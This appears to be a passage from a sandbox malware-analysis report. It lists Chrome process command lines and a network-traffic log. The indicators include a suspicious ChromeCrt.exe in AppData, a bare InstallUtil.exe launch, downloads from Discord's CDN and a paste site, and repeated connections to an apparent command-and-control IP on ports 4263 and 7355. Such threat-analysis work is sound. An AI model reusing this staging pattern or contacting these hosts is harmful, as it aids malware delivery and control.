"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1760 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2244 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3108 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4736 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4880 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4840 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5152 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5424 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4836 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5436 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5872 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5856 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5268 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5668 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=3336 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6236 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6392 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=6308 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6328 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6064 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5160 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=5656 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6632 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=1852 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=7172 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=7420 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=7292 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=6692 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=7788 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=1636 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=5768 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=7384 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=7980 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=7616 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=7252 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=3228 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=6572 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=6900 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=8404 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:2

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.113.22.20.in-addr.arpa udp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
US 8.8.8.8:53 img.guildedcdn.com udp
NL 13.227.219.31:443 img.guildedcdn.com tcp
US 8.8.8.8:53 31.219.227.13.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 203.33.253.131.in-addr.arpa udp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 17.14.97.104.in-addr.arpa udp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
US 8.8.8.8:53 textbin.net udp
US 148.72.177.212:443 textbin.net tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 212.177.72.148.in-addr.arpa udp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
TR 46.1.103.69:4263 tcp
US 8.8.8.8:53 69.103.1.46.in-addr.arpa udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 162.159.129.233:443 cdn.discordapp.com tcp
TR 46.1.103.69:4263 tcp
TR 46.1.103.69:7355 tcp
TR 46.1.103.69:4263 tcp
TR 46.1.103.69:7355 tcp
US 8.8.8.8:53 img.guildedcdn.com udp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
NL 13.227.219.31:443 img.guildedcdn.com tcp
US 148.72.177.212:443 textbin.net tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
TR 46.1.103.69:4263 tcp
US 8.8.8.8:53 170.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
NL 142.251.36.46:443 clients2.google.com udp
NL 142.251.36.46:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 46.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 mediafire.com udp
US 104.16.113.74:443 mediafire.com tcp
US 104.16.113.74:443 mediafire.com tcp
US 8.8.8.8:53 www.mediafire.com udp
US 8.8.8.8:53 static.mediafire.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
NL 172.217.168.202:443 ajax.googleapis.com tcp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 8.8.8.8:53 cdn.amplitude.com udp
US 104.16.57.101:443 static.cloudflareinsights.com tcp
US 18.239.63.113:443 cdn.amplitude.com tcp
US 8.8.8.8:53 74.113.16.104.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 202.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 113.63.239.18.in-addr.arpa udp
US 8.8.8.8:53 101.57.16.104.in-addr.arpa udp
US 8.8.8.8:53 200.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 api.amplitude.com udp
US 54.244.175.36:443 api.amplitude.com tcp
US 8.8.8.8:53 static.hotjar.com udp
US 18.239.94.35:443 static.hotjar.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
NL 142.250.179.138:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 36.175.244.54.in-addr.arpa udp
US 8.8.8.8:53 35.94.239.18.in-addr.arpa udp
US 8.8.8.8:53 138.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 analytics.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
NL 142.250.102.156:443 stats.g.doubleclick.net tcp
US 8.8.8.8:53 script.hotjar.com udp
US 216.239.32.181:443 analytics.google.com tcp
US 18.238.243.111:443 script.hotjar.com tcp
NL 142.250.102.156:443 stats.g.doubleclick.net udp
US 8.8.8.8:53 device.maxmind.com udp
US 162.159.134.22:443 device.maxmind.com tcp
US 8.8.8.8:53 156.102.250.142.in-addr.arpa udp
US 8.8.8.8:53 181.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 111.243.238.18.in-addr.arpa udp
US 8.8.8.8:53 22.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 d-ipv6.mmapiws.com udp
US 172.64.145.79:443 d-ipv6.mmapiws.com tcp
US 8.8.8.8:53 79.145.64.172.in-addr.arpa udp
US 8.8.8.8:53 app.mediafire.com udp
US 216.239.32.181:443 analytics.google.com udp
US 104.16.113.74:443 app.mediafire.com tcp
US 104.16.113.74:443 app.mediafire.com tcp
US 8.8.8.8:53 sessions.bugsnag.com udp
US 35.190.88.7:443 sessions.bugsnag.com tcp
US 35.190.88.7:443 sessions.bugsnag.com udp
NL 172.217.168.202:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 7.88.190.35.in-addr.arpa udp
US 8.8.8.8:53 www.mediafireuserupload.com udp
US 104.16.125.23:443 www.mediafireuserupload.com tcp
US 8.8.8.8:53 23.125.16.104.in-addr.arpa udp
US 8.8.8.8:53 the.gatekeeperconsent.com udp
US 8.8.8.8:53 btloader.com udp
US 172.67.144.62:443 the.gatekeeperconsent.com tcp
US 104.22.75.216:443 btloader.com tcp
US 8.8.8.8:53 www.ezojs.com udp
US 8.8.8.8:53 translate.google.com udp
NL 142.250.179.206:443 translate.google.com tcp
US 172.67.170.144:443 www.ezojs.com tcp
US 104.21.28.48:443 the.gatekeeperconsent.com tcp
US 104.21.28.48:443 the.gatekeeperconsent.com udp
US 172.67.144.62:443 the.gatekeeperconsent.com udp
US 8.8.8.8:53 cdn.otnolatrnup.com udp
US 104.19.214.37:443 cdn.otnolatrnup.com tcp
US 8.8.8.8:53 api.btloader.com udp
US 8.8.8.8:53 ad-delivery.net udp
NL 142.250.179.138:443 content-autofill.googleapis.com udp
US 130.211.23.194:443 api.btloader.com tcp
US 104.26.3.70:443 ad-delivery.net tcp
US 104.26.3.70:443 ad-delivery.net tcp
US 8.8.8.8:53 62.144.67.172.in-addr.arpa udp
US 8.8.8.8:53 216.75.22.104.in-addr.arpa udp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 144.170.67.172.in-addr.arpa udp
US 8.8.8.8:53 48.28.21.104.in-addr.arpa udp
US 8.8.8.8:53 37.214.19.104.in-addr.arpa udp
US 8.8.8.8:53 translate.googleapis.com udp
US 8.8.8.8:53 g.ezoic.net udp
NL 142.251.36.10:443 translate.googleapis.com tcp
DE 3.67.181.148:443 g.ezoic.net tcp
US 8.8.8.8:53 go.ezodn.com udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 130.211.23.194:443 api.btloader.com udp
DE 172.217.23.194:443 securepubads.g.doubleclick.net tcp
US 172.64.136.15:443 go.ezodn.com tcp
US 172.64.136.15:443 go.ezodn.com tcp
US 172.64.136.15:443 go.ezodn.com tcp
US 172.67.144.62:443 the.gatekeeperconsent.com udp
US 8.8.8.8:53 otnolatrnup.com udp
US 8.8.8.8:53 btlr.sharethrough.com udp
US 8.8.8.8:53 hbopenbid.pubmatic.com udp
US 8.8.8.8:53 prebid.media.net udp
US 8.8.8.8:53 tlx.3lift.com udp
NL 185.64.189.112:443 hbopenbid.pubmatic.com tcp
US 34.120.63.153:443 prebid.media.net tcp
DE 3.69.135.220:443 tlx.3lift.com tcp
US 8.8.8.8:53 translate-pa.googleapis.com udp
DE 52.29.49.248:443 btlr.sharethrough.com tcp
DE 52.29.49.248:443 btlr.sharethrough.com tcp
DE 52.29.49.248:443 btlr.sharethrough.com tcp
DE 52.29.49.248:443 btlr.sharethrough.com tcp
DE 52.29.49.248:443 btlr.sharethrough.com tcp
US 8.8.8.8:53 194.23.211.130.in-addr.arpa udp
US 8.8.8.8:53 198.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 15.136.64.172.in-addr.arpa udp
US 8.8.8.8:53 148.181.67.3.in-addr.arpa udp
US 8.8.8.8:53 194.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 112.189.64.185.in-addr.arpa udp
US 8.8.8.8:53 70.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 10.36.251.142.in-addr.arpa udp
US 172.64.136.15:443 go.ezodn.com udp
DE 172.217.23.194:443 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
NL 142.250.179.206:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 153.63.120.34.in-addr.arpa udp
US 8.8.8.8:53 248.49.29.52.in-addr.arpa udp
US 8.8.8.8:53 220.135.69.3.in-addr.arpa udp
NL 142.250.179.206:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
NL 142.251.36.1:443 lh3.googleusercontent.com udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
